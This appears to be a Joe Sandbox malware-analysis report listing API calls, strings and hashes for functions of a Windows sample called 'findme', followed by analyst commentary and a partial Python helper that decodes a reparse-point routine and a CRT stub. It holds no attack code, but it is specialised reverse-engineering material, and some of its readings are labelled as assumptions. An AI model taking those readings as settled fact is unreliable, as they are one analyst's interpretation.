                    • Opcode Fuzzy Hash: bda469f4dfb49036d978e708c1d3a3560a3afe67a32187cd752fd2c090821a9c
                    • Instruction Fuzzy Hash: 44A0129966C006BC30081212AC2BD37022CC0C0B14330440FB1068014059481C09003D
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDC36
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                     • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: f2ffef9c72fe8c397ccb58e22397aefc41d9f24b295bbc352863a83fcc25ccd1
                    • Instruction ID: 2c109875889f58559786dce60af5962edaa1a0efbbc5b5edccd598a68d5ceff7
                    • Opcode Fuzzy Hash: f2ffef9c72fe8c397ccb58e22397aefc41d9f24b295bbc352863a83fcc25ccd1
                    • Instruction Fuzzy Hash: CEA0129597C1027C300C2241AC26D36022CC0C0F10730480FB1069014055881C09403D
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDC36
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                     • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 4137c85bac73cf90b00955982a38bef77729d0903f5e52cc39364502190d456f
                    • Instruction ID: 2c109875889f58559786dce60af5962edaa1a0efbbc5b5edccd598a68d5ceff7
                    • Opcode Fuzzy Hash: 4137c85bac73cf90b00955982a38bef77729d0903f5e52cc39364502190d456f
                    • Instruction Fuzzy Hash: CEA0129597C1027C300C2241AC26D36022CC0C0F10730480FB1069014055881C09403D
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDBD5
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                     • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: d13271c20b0fc6e3316a92850ef9d484fa0980166a10a2b83464e938236cf0d1
                    • Instruction ID: 570f39233ed7a99baa4b23c68198673bd71ea8b590e4a36cb5d51e37d488c03f
                    • Opcode Fuzzy Hash: d13271c20b0fc6e3316a92850ef9d484fa0980166a10a2b83464e938236cf0d1
                    • Instruction Fuzzy Hash: 44A0129966C006BC30081212AC2BD37022CC0C0B14330440FB1068014059481C09003D
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDBD5
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                     • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 0186920e670f657d622bdf0f2a0ff30b3a9ff87355c58a9e3de5e40ab004eea5
                    • Instruction ID: 570f39233ed7a99baa4b23c68198673bd71ea8b590e4a36cb5d51e37d488c03f
                    • Opcode Fuzzy Hash: 0186920e670f657d622bdf0f2a0ff30b3a9ff87355c58a9e3de5e40ab004eea5
                    • Instruction Fuzzy Hash: 44A0129966C006BC30081212AC2BD37022CC0C0B14330440FB1068014059481C09003D
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDBD5
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                     • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 7cc0f52837797c14048d9939d05961776693b5d43ced1fbe9b8ad6fa9c9f351d
                    • Instruction ID: 570f39233ed7a99baa4b23c68198673bd71ea8b590e4a36cb5d51e37d488c03f
                    • Opcode Fuzzy Hash: 7cc0f52837797c14048d9939d05961776693b5d43ced1fbe9b8ad6fa9c9f351d
                    • Instruction Fuzzy Hash: 44A0129966C006BC30081212AC2BD37022CC0C0B14330440FB1068014059481C09003D
                    APIs
                    • SetEndOfFile.KERNELBASE(?,004C9104,?,?,-00001964), ref: 004C9EC2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                     • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: File
                    • String ID:
                    • API String ID: 749574446-0
                    • Opcode ID: 754f8a07655b022a77a97fffcef4b85d4bcc3d086acd5cf4eb9dd092036e5894
                    • Instruction ID: 8ab5c80bce1c171da5b6ab5cbcd4294322a10daad7ba8c3d4c96611713acb63a
                    • Opcode Fuzzy Hash: 754f8a07655b022a77a97fffcef4b85d4bcc3d086acd5cf4eb9dd092036e5894
                    • Instruction Fuzzy Hash: C1B011300A000A8A8E002F30CC088283A20EA2230B30082B0A002CA0A8CF22C022AA08
                    APIs
                    • SetCurrentDirectoryW.KERNELBASE(?,004DA587,C:\Users\user\Desktop,00000000,0050946A,00000006), ref: 004DA326
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                     • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: CurrentDirectory
                    • String ID:
                    • API String ID: 1611563598-0
                    • Opcode ID: aef0d1a9ad78c03a2a7cf9cddf09d69dc17ea74666a345e13e29d71f18b79653
                    • Instruction ID: 1413f64ff3d5477877655de73bfd20bafc1463aff4ceebaeb4a0c14aceb9bb63
                    • Opcode Fuzzy Hash: aef0d1a9ad78c03a2a7cf9cddf09d69dc17ea74666a345e13e29d71f18b79653
                    • Instruction Fuzzy Hash: 64A01230194006568A000F30CD09C2576505760703F0086307042C00A0CB318824E504
                    APIs
                    • CloseHandle.KERNELBASE(000000FF,?,?,004C968F,?,?,?,?,004F1FA1,000000FF), ref: 004C96EB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: CloseHandle
                    • String ID:
                    • API String ID: 2962429428-0
                    • Opcode ID: b136ff1e04496b6e1000cee176936713aff27bfeb8c7b55c8b7ec3fa609a0d9a
                    • Instruction ID: 6b0d677f8777528f7d4154241348b85bf17273ea29b695128bb453e85adcd2a2
                    • Opcode Fuzzy Hash: b136ff1e04496b6e1000cee176936713aff27bfeb8c7b55c8b7ec3fa609a0d9a
                    • Instruction Fuzzy Hash: 19F0BE38146B00AFDB308E24C58CB93B7E4AB12325F048B2F80EB036E097686C4D8B08
                    APIs
                      • Part of subcall function 004C130B: GetDlgItem.USER32(00000000,00003021), ref: 004C134F
                      • Part of subcall function 004C130B: SetWindowTextW.USER32(00000000,004F35B4), ref: 004C1365
                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 004DB971
                    • EndDialog.USER32(?,00000006), ref: 004DB984
                    • GetDlgItem.USER32(?,0000006C), ref: 004DB9A0
                    • SetFocus.USER32(00000000), ref: 004DB9A7
                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 004DB9E1
                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 004DBA18
                    • FindFirstFileW.KERNEL32(?,?), ref: 004DBA2E
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004DBA4C
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 004DBA5C
                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 004DBA78
                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 004DBA94
                    • _swprintf.LIBCMT ref: 004DBAC4
                      • Part of subcall function 004C400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004C401D
                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 004DBAD7
                    • FindClose.KERNEL32(00000000), ref: 004DBADE
                    • _swprintf.LIBCMT ref: 004DBB37
                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 004DBB4A
                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 004DBB67
                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 004DBB87
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 004DBB97
                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 004DBBB1
                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 004DBBC9
                    • _swprintf.LIBCMT ref: 004DBBF5
                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 004DBC08
                    • _swprintf.LIBCMT ref: 004DBC5C
                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 004DBC6F
                      • Part of subcall function 004DA63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 004DA662
                      • Part of subcall function 004DA63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,004FE600,?,?), ref: 004DA6B1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                    • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                    • API String ID: 797121971-1840816070
                    • Opcode ID: 870569e7d77757acd03354b54adf1b75a8b095a0ef8bfce0f0ee9afae9c5bdeb
                    • Instruction ID: ba94604149845b44ea6cfe17b52545a68245bd2ea79edef203a4d66602dcebed
                    • Opcode Fuzzy Hash: 870569e7d77757acd03354b54adf1b75a8b095a0ef8bfce0f0ee9afae9c5bdeb
                    • Instruction Fuzzy Hash: 6091B1B2548348BBD6309BA0CD59FFB77ACEB8A704F00081BB749D2191DB78A605C776
                    APIs
                    • __EH_prolog.LIBCMT ref: 004C7191
                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 004C72F1
                    • CloseHandle.KERNEL32(00000000), ref: 004C7301
                      • Part of subcall function 004C7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 004C7C04
                      • Part of subcall function 004C7BF5: GetLastError.KERNEL32 ref: 004C7C4A
                      • Part of subcall function 004C7BF5: CloseHandle.KERNEL32(?), ref: 004C7C59
                    • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 004C730C
                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 004C741A
                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 004C7446
                    • CloseHandle.KERNEL32(?), ref: 004C7457
                    • GetLastError.KERNEL32 ref: 004C7467
                    • RemoveDirectoryW.KERNEL32(?), ref: 004C74B3
                    • DeleteFileW.KERNEL32(?), ref: 004C74DB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                    • API String ID: 3935142422-3508440684
                    • Opcode ID: 4f4846512dc743c1cf8d8d0f5b8dbd1cd111b6862ba24435ccef3695dc3b9ede
                    • Instruction ID: cf813975cce8c28d950e9ef5e558cd7081aeb48941fbea16e9e174f8d5a9b92d
                    • Opcode Fuzzy Hash: 4f4846512dc743c1cf8d8d0f5b8dbd1cd111b6862ba24435ccef3695dc3b9ede
                    • Instruction Fuzzy Hash: CAB1D375904215ABDB24DF65CC45FEF7B78AF04308F0440AEF945E7242DB38AA49CB69
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: H_prolog_memcmp
                    • String ID: CMT$h%u$hc%u
                    • API String ID: 3004599000-3282847064
                    • Opcode ID: 4f47afff9febda1f6ee6641f7202464cfbdd3a2ce3c7672a321a1d6b1494206c
                    • Instruction ID: 47927dbb53a0df05d0195bfac7180938ec847d7c54e731aca70fecd4eb88f675
                    • Opcode Fuzzy Hash: 4f47afff9febda1f6ee6641f7202464cfbdd3a2ce3c7672a321a1d6b1494206c
                    • Instruction Fuzzy Hash: 2732E4756102849FDF54DF24C885FEA37A5AF15304F04447FFD8A8B282DB78AA49CB68
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: __floor_pentium4
                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                    • API String ID: 4168288129-2761157908
                    • Opcode ID: 2b76928d8002313cb2283aed9d795bcf18699b243914a4bea8e7e37bcc458301
                    • Instruction ID: 8a42b5a48df6d0f931ad4824d22e2275f4401ff6f8e488fb686c13a618d344cd
                    • Opcode Fuzzy Hash: 2b76928d8002313cb2283aed9d795bcf18699b243914a4bea8e7e37bcc458301
                    • Instruction Fuzzy Hash: 39C24971E086688FDB25CE2ADD407EAB3B5EB44306F1541EBD84DE7240E778AE818F45
                    APIs
                    • __EH_prolog.LIBCMT ref: 004C27F1
                    • _strlen.LIBCMT ref: 004C2D7F
                      • Part of subcall function 004D137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,004CB652,00000000,?,?,?,00010434), ref: 004D1396
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004C2EE0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                    • String ID: CMT
                    • API String ID: 1706572503-2756464174
                    • Opcode ID: 12f1199886dea6b2374d13b9dc3ac88b405f6a51bb81349c8b469e57337c9603
                    • Instruction ID: 65dfe0605fe4b2a488cd6da29a0c016955eb434c072a4f1490e9e4dc421414a4
                    • Opcode Fuzzy Hash: 12f1199886dea6b2374d13b9dc3ac88b405f6a51bb81349c8b469e57337c9603
                    • Instruction Fuzzy Hash: 1062F3795002448FDF58DF25C985BEA3BE1AF54304F08457FEC9A8B382DBB8A945CB58
                    APIs
                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 004E8767
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 004E8771
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 004E877E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: acecb563a20a17d8a264f0abee412df802528de6d60235d2c25085ff7e5d924f
                    • Instruction ID: 67395d7618bf5cd6ae20c397cdbd4ac2c631313a7317afbaec91e6caab76a150
                    • Opcode Fuzzy Hash: acecb563a20a17d8a264f0abee412df802528de6d60235d2c25085ff7e5d924f
                    • Instruction Fuzzy Hash: 2031D575901228ABCB21DF25DD88B9DBBB4AF08311F5041EAE80CA7250EB349B858F49
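Two of the entries above reward decoding by hand. In the routine at 004C7191, the second CreateFileW opens an existing path (disposition 3 = OPEN_EXISTING) for GENERIC_READ|GENERIC_WRITE with flags 02200000 = FILE_FLAG_BACKUP_SEMANTICS|FILE_FLAG_OPEN_REPARSE_POINT, and the DeviceIoControl code 000900A4 is CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 41, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) = FSCTL_SET_REPARSE_POINT; together with the SeCreateSymbolicLinkPrivilege, SeRestorePrivilege, UNC\ and \??\ strings, this is a reparse-point (symbolic-link or junction) creation routine with cleanup via RemoveDirectoryW/DeleteFileW on failure. In the entry at 004E8767, the IsDebuggerPresent, SetUnhandledExceptionFilter(NULL), UnhandledExceptionFilter sequence is the call pattern of the statically linked MSVC CRT's security-failure/fault-reporting stub rather than an anti-debugging check, which is worth knowing before weighting the "Contains functionality to check if a debugger is running" signature. The following Python helper is an added example, not part of the Joe Sandbox report or of the sample: it parses the report's own "APIs" lines (the sample input below is copied from the two entries and is the only input), decodes the IOCTL and CreateFileW arguments, and tags the patterns. The finding tags and the CRT attribution are this example's own assumptions.

```python
"""Decode Joe Sandbox 'APIs' lines and tag reparse-point and CRT-stub patterns (added example)."""
import re
from dataclasses import dataclass, field

# Constructed sample input: API lines copied verbatim from two function entries
# of this report (routine at 004C72F1..004C74DB, stub at 004E8767..004E877E).
SAMPLE_LINES = """\
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 004C72F1
• CloseHandle.KERNEL32(00000000), ref: 004C7301
• CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 004C730C
• CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 004C741A
• DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 004C7446
• CloseHandle.KERNEL32(?), ref: 004C7457
• GetLastError.KERNEL32 ref: 004C7467
• RemoveDirectoryW.KERNEL32(?), ref: 004C74B3
• DeleteFileW.KERNEL32(?), ref: 004C74DB
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 004E8767
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 004E8771
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 004E877E
"""

# "• Api.MODULE(arg,arg,...), ref: ADDR"; the argument list is optional (GetLastError).
LINE_RE = re.compile(
    r"•\s*(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int
    args: list = field(default_factory=list)  # int per argument, None for an unresolved "?"


def parse_api_lines(text: str) -> list:
    """Parse report lines into ApiCall records; hex arguments may be negative ("-00000008")."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = [None if a.strip() == "?" else int(a, 16) for a in raw.split(",") if a.strip()]
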